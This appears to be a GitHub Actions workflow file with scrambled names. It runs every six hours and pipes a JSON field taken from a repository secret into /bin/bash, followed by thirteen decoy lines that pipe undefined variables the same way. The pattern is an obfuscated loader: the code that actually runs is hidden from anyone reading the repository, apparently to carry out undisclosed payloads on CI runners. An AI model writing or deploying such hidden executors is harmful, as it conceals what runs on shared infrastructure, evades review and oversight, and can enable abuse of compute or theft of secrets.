name: luantanwanyu

on:
  workflow_dispatch:
  schedule:
    - cron: '46 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: luantanwanyu
        env:
          lmuon7397: ${{ secrets.lmuon7397 }}
        run: |
          echo $lmuon7397 | jq -r .k592 | /bin/bash
          echo $uvce423 | jq -r .cdpq03 | /bin/bash
          echo $rnmo9473 | jq -r .x0 | /bin/bash
          echo $szmo58432 | jq -r .x67530 | /bin/bash
          echo $anfxy906 | jq -r .ujs21653 | /bin/bash
          echo $rbsy9 | jq -r .gyo027 | /bin/bash
          echo $qhf42089 | jq -r .vrl1 | /bin/bash
          echo $h021 | jq -r .t1 | /bin/bash
          echo $lckcz1 | jq -r .x3682 | /bin/bash
          echo $tpzxp24 | jq -r .nmlf37949 | /bin/bash
          echo $oey2391 | jq -r .dcne7 | /bin/bash
          echo $n41 | jq -r .yitj05466 | /bin/bash
          echo $tjwa4 | jq -r .h5 | /bin/bash
          echo $pbq92958 | jq -r .houmx043 | /bin/bash

